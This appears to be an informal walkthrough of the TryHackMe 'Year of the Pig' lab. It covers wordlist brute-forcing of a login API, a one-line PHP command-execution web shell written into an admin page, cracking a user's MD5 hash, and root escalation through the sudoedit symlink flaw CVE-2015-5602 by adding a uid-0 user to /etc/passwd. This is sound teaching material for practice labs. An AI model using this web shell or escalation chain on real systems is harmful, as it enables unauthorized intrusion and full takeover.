Hello hacker, i assume you are here cause you are stuck and don’t know what to do next right? worry not i am here and with that let’s start with enumeration using nmap:
We can see there are two open ports http and ssh. let’s check http.
we see quite attractive webpage which is about planes and Marco’s love for them. let’s fuzz some web directories and subdomains.
here we see two interesting directories admin and api. let’s check them.when we visit /admin it redirects us to login.php which is a login page. when i try to fool around i found out it is sending username and password via an api in json format and also encoding our entered password into MD5 hash.
and not only that we also a got a hint saying
Remember that passwords should be a memorable word, followed by two numbers and a special character
Time to read boys. After reading i found a word which matches the description of the hint.
“SavoiaS21" let’s create a wordlist using this word.
savoia21
savoias21
SavoiaS21
Savoia21
Save this in a txt file. This matches the description but there is one little thing missing, yes the last letter is supposed to a special character. How to add that and make above list a wordlist? Ever heard about john? let’s edit the config file and add our custom rule to generate wordlist. How to do it? worry not just follow me.
sudo nano /etc/john/john.conf
after that scroll down you will see
worry not it’s nothing just below this add this
[List.Rules:marco]
Az”[!?#$%&/()=]”
save it and now time to generate the wordlist. nothing more just paste the command below and hit enter you will get your wordlist sir.
john — wordlist=special_word.txt — rule=marco -stdout > wordlist.txt
Now, you have wordlist,login page what we are missing? oh right we have to encode the passwords and sent them over api/login in json format. how do we do that lord? python.. yes we create our own script hehe sounds cool eh.
Here is the code that will help you with our problem. It’s messy cause i am total novice programmer. Make sure you change the path of directory for wordlist and also don’t forget to change the ip with thm’s ip. Let’s hit that code with our freshly generated wordlist.
we got our password but we got something extra too haha well ignore that. too lazy to debug the code. Our password is savoia21!
Let’s login and see what marco have there for us.
We can see there are many pages after checking all of them we find out that there is another user named curtis might be useful later who knows right and another interesting page is commands where we can execute commands hehehe yeah boi that’s what we are looking right yes but no it’s not that guys it only execute ls and whoami. That’s depressing.
Flag 1
what next? let’s recall everything we enumerate ip and found out 2 open ports one was http and another one was ssh wow! we almost forgot about ssh let’s try with credentials we just found from auth.py.
Bingo!
Congratulations boys we got our first flag.
Flag 2
Let’s enumerate further we see there is another user named curtis. In his home directory we see another flag and now we want but can’t get it. After fooling around i find out that there is a file in /var/www/ named admin.db which contains password of curtis. But we don’t have permission for that. I fooled around again and found about we can edit commands.php in /var/www/html/admin. Let’s edit that with following code:
<?php
echo system($_REQUEST['cmd']);
?>And now change permission for the admin.db file with following commands,
store md5 hash of curtis in a hash.txt and now time to crack it. You can use john hashcat or online sites to crack it.
a80bfe309ecaafcea1ea6cb3677971f2i use john and the password for curtis is: Donald1983$. Now use su curtis and enter the password you will get your shell. And you got your second flag.
Root Flag
Let’s run sudo -l in curtis shell we see user is allowed to run /usr/bin/sudoedit as sudo,against certain files in /var/www/html.
User curtis may run the following commands on year-of-the-pig:
(ALL : ALL) sudoedit /var/www/html/*/*/config.phpI searched for awhile and found out sudoedit designed to not be exploitable but there is an exploit for version lesser than 1.8.14 CVE-2015–5602. So, i checked the version.
curtis@year-of-the-pig:~$ sudo --version
Sudo version 1.8.13
Sudoers policy plugin version 1.8.13
Sudoers file grammar version 44
Sudoers I/O plugin version 1.8.13This confirms sudoedit is vulnerable to CVE-2015–5602. To activate this sudoers configuration we need a file called config.php, two directories under /var/www/html. But we have a problem that curtis is not a member of web developer so we have to go back in marco shell to create such a path.
curtis@year-of-the-pig:~$ exit
exit
marco@year-of-the-pig:~$ mkdir -p /var/www/html/dir1
marco@year-of-the-pig:~$ chmod 777 /var/www/html/dir1
Now that we have a valid path and any user in the machine can read,write and execute dir1 directory curtis will be able to create directories inside dir1, we need to symlink config.php to something important for example /etc/passwd. For whom symlink sounds new it’s basically a shortcut file just like in windows. you can chec out this blog for more info. Change shell to curtis and follow commands below:
curtis@year-of-the-pig:~$ mkdir /var/www/html/dir1/dir2
curtis@year-of-the-pig:~$ ln -s /etc/passwd /var/www/html/dir1/dir2/config.phpTime activate sudo permissions.
curtis@year-of-the-pig:~$ sudoedit /var/www/html/dir1/dir2/config.phpWe should now have edit access to the /etc/passwd file!
Now we can edit /etc/passwd file we can add our own user here and give root access to our user. We can do that by following simple commands:
generate our hash password using openssl
Add our user in /etc/passwd file
if you don’t know how to use vim editor then first press ‘ i ’ to switch into insert mode then add username and hashed password in the following format:
<username>:<hashed-password>:0:0::/root:/bin/bashAfter that press ‘esc’ and press ‘:wq’ to save and exit vim. Now su <your username> enter password and you got your root shell.
Navigate to /root there you can see you root flag waiting for you to cat and see inside it.
Conclusion
This was a really fun and easy one HAHA just kidding bro it was freaking hard but very knowledgeable we learned usage of python scripts to assist us in penetration testing, vulnerable version of sudoedit and ho to exploit it, what is symlink,how to edit /etc/passwd, hash decryption, api, different python modules, bruteforcing and all. I wanna thank you creator of this amazing room MuirlandOracle and thank you so much tryhackme for all this amazing ctfs.
Cybersecurity is really vast, you and me have just touched the surface of it. There is so much to learn. So, let’s learn together follow me on twitter. It’s totally alright to see writeups while you’re stuck i do that too and everyone else does none is expert, none is perfect. Everything and everyone is vulnerable but it’s upto us we patch our vulnerabilities or left them as they are. With that saying we have to say goodbye till next time. Keep learning, Keep hacking. See you ❤.
